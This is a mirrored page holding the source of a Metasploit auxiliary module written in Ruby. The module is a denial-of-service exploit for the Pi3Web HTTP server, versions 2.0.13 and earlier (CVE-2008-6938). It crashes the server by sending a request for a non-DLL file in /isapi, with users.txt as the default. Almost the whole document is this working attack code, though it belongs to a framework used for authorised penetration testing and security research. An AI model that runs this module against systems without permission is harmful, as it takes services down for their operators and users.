Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/dos/windows/http/pi3web_isapi.rb
21549 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Auxiliary

7
  include Msf::Exploit::Remote::HttpClient

8
  include Msf::Auxiliary::Dos

9


10
  def initialize(info = {})

11
    super(

12
      update_info(

13
        info,

14
        'Name' => 'Pi3Web ISAPI DoS',

15
        'Description' => %q{

16
          The Pi3Web HTTP server crashes when a request is made for an invalid DLL

17
          file in /isapi for versions 2.0.13 and earlier. By default, the non-DLLs

18
          in this directory after installation are users.txt, install.daf and

19
          readme.daf.

20
        },

21
        'Author' => 'kris katterjohn',

22
        'License' => MSF_LICENSE,

23
        'References' => [

24
          [ 'CVE', '2008-6938'],

25
          [ 'OSVDB', '49998'],

26
          [ 'EDB', '7109' ]

27
        ],

28
        'DisclosureDate' => '2008-11-13',

29
        'Notes' => {

30
          'Stability' => [CRASH_SERVICE_DOWN],

31
          'SideEffects' => [],

32
          'Reliability' => []

33
        }

34
      )

35
    )

36


37
    register_options([

38
      OptString.new('FILENAME', [ true, 'File in /isapi to request', 'users.txt' ])

39
    ])

40
  end

41


42
  def run

43
    o = { 'uri' => "/isapi/#{datastore['FILENAME']}" }

44


45
    c = connect(o)

46
    c.send_request(c.request_raw(o))

47


48
    print_status("Request sent to #{rhost}:#{rport}")

49
  rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout

50
    print_status("Couldn't connect to #{rhost}:#{rport}")

51
  rescue ::Timeout::Error, ::Errno::EPIPE => e

52
    vprint_error(e.message)

53
  end

54
end

55


56